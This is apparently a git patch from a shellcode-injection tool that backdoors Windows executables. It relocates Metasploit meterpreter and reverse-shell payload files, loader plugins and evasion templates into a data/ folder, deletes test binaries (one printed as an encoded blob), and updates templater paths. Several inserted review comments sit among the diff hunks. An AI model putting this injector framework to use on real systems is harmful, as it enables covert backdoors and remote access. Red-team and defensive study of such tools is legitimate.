From 6175875ea1d149303eb8b7338d230260bb0367a1 Mon Sep 17 00:00:00 2001 
From: Dobin
Date: Fri, 1 Mar 2024 17:07:01 +0000
Subject: [PATCH] refactor: reorganize files into data/
---
 .gitignore | 9 +++--
 {exes => data/exes}/7z.exe | Bin
 {exes => data/exes}/procexp64.exe | Bin
 {exes => data/exes}/wifiinfoview.exe | Bin
 {plugins => data/plugins}/allocator/rwx_1.c | 0
 {plugins => data/plugins}/decoder/plain_1.c | 0
 {plugins => data/plugins}/decoder/xor_1.c | 0
 {plugins => data/plugins}/executor/direct_1.c | 0
 {shellcodes => data/shellcodes}/calc64.bin | Bin
 .../shellcodes}/createfile.bin | 0
 {shellcodes => data/shellcodes}/createfile.md | 0
 .../shellcodes}/meterpreter-revtcp-win64.bin | Bin
 .../msf-meterpreter-reversetcp.bin | Bin
 .../shellcodes}/msf-meterpreter-reversetcp.md | 0
 .../shellcodes}/msf-revshell-win64.bin | Bin
 {shellcodes => data/shellcodes}/msfexec.bin | 0
 {shellcodes => data/shellcodes}/notepad64.bin | Bin
 {source => data/source}/iat_reuse/template.c | 0
 {source => data/source}/peb_walk/peb_lookup.h | 0
 {source => data/source}/peb_walk/template.c | 0
 exes/iattest-full.exe | Bin 11264 -> 0 bytes
 exes/iattest-messagebox.exe | Bin 10752 -> 0 bytes
 model/defs.py | 4 +--
 phases/injector.py | 3 --
 phases/templater.py | 28 +++++++--------
 shellcodes/convert.py | 24 -------------
 shellcodes/createfile.txt | 25 -------------
 shellcodes/msf-meterpreter-reversetcp.txt | 33 ------------------
 supermega.py | 21 +++++------
 tests/test_datareuse.py | 4 +--
 tests/test_derbackdoorer.py | 14 ++++----
 31 files changed, 42 insertions(+), 123 deletions(-)
 rename {exes => data/exes}/7z.exe (100%)
 rename {exes => data/exes}/procexp64.exe (100%)
 rename {exes => data/exes}/wifiinfoview.exe (100%)
 rename {plugins => data/plugins}/allocator/rwx_1.c (100%)
 rename {plugins => data/plugins}/decoder/plain_1.c (100%)
 rename {plugins => data/plugins}/decoder/xor_1.c (100%)
 rename {plugins => data/plugins}/executor/direct_1.c (100%)
 rename {shellcodes => data/shellcodes}/calc64.bin (100%)
 rename {shellcodes => data/shellcodes}/createfile.bin (100%)
 rename {shellcodes => data/shellcodes}/createfile.md (100%)
 rename {shellcodes => data/shellcodes}/meterpreter-revtcp-win64.bin (100%)
 rename {shellcodes => data/shellcodes}/msf-meterpreter-reversetcp.bin (100%)
 rename {shellcodes => data/shellcodes}/msf-meterpreter-reversetcp.md (100%)
 rename {shellcodes => data/shellcodes}/msf-revshell-win64.bin (100%)
 rename {shellcodes => data/shellcodes}/msfexec.bin (100%)
 rename {shellcodes => data/shellcodes}/notepad64.bin (100%)
 rename {source => data/source}/iat_reuse/template.c (100%)
 rename {source => data/source}/peb_walk/peb_lookup.h (100%)
 rename {source => data/source}/peb_walk/template.c (100%)
 delete mode 100644 exes/iattest-full.exe
 delete mode 100644 exes/iattest-messagebox.exe
 delete mode 100644 shellcodes/convert.py
 delete mode 100644 shellcodes/createfile.txt
 delete mode 100644 shellcodes/msf-meterpreter-reversetcp.txt
diff --git a/.gitignore b/.gitignore
index 2017359..c7b208f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,9 @@
-*infected.exe*
-*a.exe*
-exes_more/
+*.exe.injected
+*-verify.exe
+*.infected.exe
+app/upload/*
+data/exes_more/
+data/shellcodes/*.txt
 *.obj
 *.lnk
 /*.bin
diff --git a/exes/7z.exe b/data/exes/7z.exe
similarity index 100%
rename from exes/7z.exe
rename to data/exes/7z.exe
diff --git a/exes/procexp64.exe b/data/exes/procexp64.exe
similarity index 100%
rename from exes/procexp64.exe
rename to data/exes/procexp64.exe
diff --git a/exes/wifiinfoview.exe b/data/exes/wifiinfoview.exe
similarity index 100%
rename from exes/wifiinfoview.exe
rename to data/exes/wifiinfoview.exe
diff --git a/plugins/allocator/rwx_1.c b/data/plugins/allocator/rwx_1.c
similarity index 100%
rename from plugins/allocator/rwx_1.c
rename to data/plugins/allocator/rwx_1.c
diff --git a/plugins/decoder/plain_1.c b/data/plugins/decoder/plain_1.c
similarity index 100%
rename from plugins/decoder/plain_1.c
rename to data/plugins/decoder/plain_1.c
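Review bot: The new ignore rules miss the artifacts the tests in this same commit write into the tracked `data/exes/` directory — `data/exes/shellcode.test`, `data/exes/iattest-full-test.exe` and `data/exes/7z-test.exe` match none of `*.exe.injected`, `*-verify.exe` or `*.infected.exe`, so a `git add data/` after a test run stages backdoored binaries next to the clean carriers. Adding `*-test.exe` and `*.test` closes that gap; a single dedicated, ignored output directory for everything the injector produces would be the safer layout. Replacing `*infected.exe*` with the narrower `*.infected.exe` also stops matching names such as `7z_infected.exe`, which is fine only if the injector never writes that form — its output naming is not visible in this diff, so worth confirming.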
diff --git a/plugins/decoder/xor_1.c b/data/plugins/decoder/xor_1.c
similarity index 100%
rename from plugins/decoder/xor_1.c
rename to data/plugins/decoder/xor_1.c
diff --git a/plugins/executor/direct_1.c b/data/plugins/executor/direct_1.c
similarity index 100%
rename from plugins/executor/direct_1.c
rename to data/plugins/executor/direct_1.c
diff --git a/shellcodes/calc64.bin b/data/shellcodes/calc64.bin
similarity index 100%
rename from shellcodes/calc64.bin
rename to data/shellcodes/calc64.bin
diff --git a/shellcodes/createfile.bin b/data/shellcodes/createfile.bin
similarity index 100%
rename from shellcodes/createfile.bin
rename to data/shellcodes/createfile.bin
diff --git a/shellcodes/createfile.md b/data/shellcodes/createfile.md
similarity index 100%
rename from shellcodes/createfile.md
rename to data/shellcodes/createfile.md
diff --git a/shellcodes/meterpreter-revtcp-win64.bin b/data/shellcodes/meterpreter-revtcp-win64.bin
similarity index 100%
rename from shellcodes/meterpreter-revtcp-win64.bin
rename to data/shellcodes/meterpreter-revtcp-win64.bin
diff --git a/shellcodes/msf-meterpreter-reversetcp.bin b/data/shellcodes/msf-meterpreter-reversetcp.bin
similarity index 100%
rename from shellcodes/msf-meterpreter-reversetcp.bin
rename to data/shellcodes/msf-meterpreter-reversetcp.bin
diff --git a/shellcodes/msf-meterpreter-reversetcp.md b/data/shellcodes/msf-meterpreter-reversetcp.md
similarity index 100%
rename from shellcodes/msf-meterpreter-reversetcp.md
rename to data/shellcodes/msf-meterpreter-reversetcp.md
diff --git a/shellcodes/msf-revshell-win64.bin b/data/shellcodes/msf-revshell-win64.bin
similarity index 100%
rename from shellcodes/msf-revshell-win64.bin
rename to data/shellcodes/msf-revshell-win64.bin
diff --git a/shellcodes/msfexec.bin b/data/shellcodes/msfexec.bin
similarity index 100%
rename from shellcodes/msfexec.bin
rename to data/shellcodes/msfexec.bin
diff --git a/shellcodes/notepad64.bin b/data/shellcodes/notepad64.bin similarity index 100% rename from shellcodes/notepad64.bin rename to data/shellcodes/notepad64.bin diff --git a/source/iat_reuse/template.c b/data/source/iat_reuse/template.c similarity index 100% rename from source/iat_reuse/template.c rename to data/source/iat_reuse/template.c diff --git a/source/peb_walk/peb_lookup.h b/data/source/peb_walk/peb_lookup.h similarity index 100% rename from source/peb_walk/peb_lookup.h rename to data/source/peb_walk/peb_lookup.h diff --git a/source/peb_walk/template.c b/data/source/peb_walk/template.c similarity index 100% rename from source/peb_walk/template.c rename to data/source/peb_walk/template.c diff --git a/exes/iattest-full.exe b/exes/iattest-full.exe deleted file mode 100644 index acf4100e80237ba91d1c5dcc00e1274e37439f5f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 11264 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 ECloTX9{>OV diff --git a/model/defs.py b/model/defs.py index 8ca31b2..34b573e 100644 --- a/model/defs.py +++ b/model/defs.py @@ -4,11 +4,11 @@ import os class FilePath(str): pass -# with shellcodes/createfile.bin +# with data/shellcodes/createfile.bin VerifyFilename: FilePath = r'C:\Temp\a' # Correlated with real template files -# in plugins/ +# in data/plugins/ class AllocStyle(Enum): RWX = "rwx_1" diff --git a/phases/injector.py b/phases/injector.py index e225684..af423d5 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -1,9 +1,6 @@ from helper import * -import shutil -import pprint import logging import time -import tempfile import logging from model.carrier import Carrier, DataReuseEntry diff --git a/phases/templater.py b/phases/templater.py index 5025657..dc8a209 100644 --- a/phases/templater.py +++ b/phases/templater.py @@ -12,8 +12,8 @@ logger = logging.getLogger("Assembler") # INPUT: -# plugins/ -# source/ +# data/plugins/ +# data/source/ # # Output: # build/main.c 
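Review bot: The import cleanup in the `phases/injector.py` hunk still leaves `import logging` twice in the new header (once before `import time`, once after the removed `import tempfile`); the second `import logging` belongs with the other imports this hunk drops. Harmless at runtime, but it defeats the purpose of a hunk whose only job is to tidy the module's imports.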
@@ -34,14 +34,14 @@ def create_c_from_template(
 source_style.value, alloc_style.value, decoder_style.value, exec_style.value
 ))
- filepath = "plugins/allocator/{}.c".format(alloc_style.value)
+ filepath = "data/plugins/allocator/{}.c".format(alloc_style.value)
 with open(filepath, "r", encoding='utf-8') as file:
 plugin_allocator = file.read()
 plugin_allocator = Template(plugin_allocator).render({
 'PAYLOAD_LEN': payload_len,
 })
- filepath = "plugins/decoder/{}.c".format(decoder_style.value)
+ filepath = "data/plugins/decoder/{}.c".format(decoder_style.value)
 with open(filepath, "r", encoding='utf-8') as file:
 plugin_decoder = file.read()
 plugin_decoder = Template(plugin_decoder).render({
@@ -49,8 +49,8 @@ def create_c_from_template(
 'XOR_KEY': config.xor_key,
 })
- filepath = "plugins/executor/{}.c".format(exec_style.value)
- with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
+ filepath = "data/plugins/executor/{}.c".format(exec_style.value)
+ with open("data/plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
 plugin_executor = file.read()
 plugin_executor = Template(plugin_executor).render({
 'PAYLOAD_LEN': payload_len,
@@ -58,7 +58,7 @@ def create_c_from_template(
 if source_style == SourceStyle.peb_walk:
 if use_templates:
- with open("source/peb_walk/template.c", 'r', encoding='utf-8') as file:
+ with open("data/source/peb_walk/template.c", 'r', encoding='utf-8') as file:
 template_content = file.read()
 observer.add_text("main_c_template", template_content)
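Review bot: In the `@@ -49,8 +49,8 @@` hunk the executor path built from `exec_style` is still thrown away: `filepath = "data/plugins/executor/{}.c".format(exec_style.value)` is immediately followed by `with open("data/plugins/executor/direct_1.c", ...)`, so every executor choice renders `direct_1.c`, and the rename carries that bug forward untouched. The line should read `with open(filepath, "r", encoding='utf-8') as file:`, as the allocator and decoder branches in the `@@ -34` hunk already do. All of these `data/plugins/...` paths are also relative to the current working directory, so the templater only finds its plugins when invoked from the repository root; anchoring them on the module's own directory would make the move robust, assuming `os` or `pathlib` is available here (the module's imports are outside the hunk). `create_c_from_template` begins before these hunks.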
@@ -74,16 +74,16 @@ def create_c_from_template(
 observer.add_text("main_c_rendered", rendered_template)
 # TODO PEB
- shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
+ shutil.copy("data/source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
 else:
- observer.add_text("main_c", file_readall_text("source/peb_walk/main.c"))
- shutil.copy("source/peb_walk/main.c", main_c_file)
+ observer.add_text("main_c", file_readall_text("data/source/peb_walk/main.c"))
+ shutil.copy("data/source/peb_walk/main.c", main_c_file)
 # TODO PEB
- shutil.copy("source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
+ shutil.copy("data/source/peb_walk/peb_lookup.h", "build/peb_lookup.h")
 elif source_style == SourceStyle.iat_reuse:
 if use_templates:
- with open("source/iat_reuse/template.c", 'r', encoding='utf-8') as file:
+ with open("data/source/iat_reuse/template.c", 'r', encoding='utf-8') as file:
 template_content = file.read()
 observer.add_text("main_c_template", template_content)
 template = Template(template_content)
@@ -97,5 +97,5 @@ def create_c_from_template(
 file.write(rendered_template)
 observer.add_text("main_c_rendered", rendered_template)
 else:
- observer.add_text("main_c", file_readall_text("source/iat_reuse/main.c"))
- shutil.copy("source/iat_reuse/main.c", main_c_file)
\ No newline at end of file
+ observer.add_text("main_c", file_readall_text("data/source/iat_reuse/main.c"))
+ shutil.copy("data/source/iat_reuse/main.c", main_c_file)
\ No newline at end of file
diff --git a/shellcodes/convert.py b/shellcodes/convert.py
deleted file mode 100644
index 3e69620..0000000
--- a/shellcodes/convert.py
+++ /dev/null
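Review bot: The non-template branches of the `@@ -74,16 +74,16 @@` and `@@ -97,5 +97,5 @@` hunks now read `data/source/peb_walk/main.c` and `data/source/iat_reuse/main.c`, but this commit's diffstat moves only `template.c` and `peb_lookup.h` into `data/source/`, so unless a `main.c` is generated or kept untracked there, `file_readall_text(...)` and `shutil.copy(...)` raise FileNotFoundError whenever `use_templates` is False. Either move those files in the same refactor or state the precondition next to the branch, e.g. `# non-template path: expects a pre-built main.c under data/source/<style>/ (not tracked in git)`. The two `# TODO PEB` markers around the `peb_lookup.h` copies are carried over verbatim without saying what is pending; one line naming the open issue would help the next reader. `create_c_from_template` starts before these hunks.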
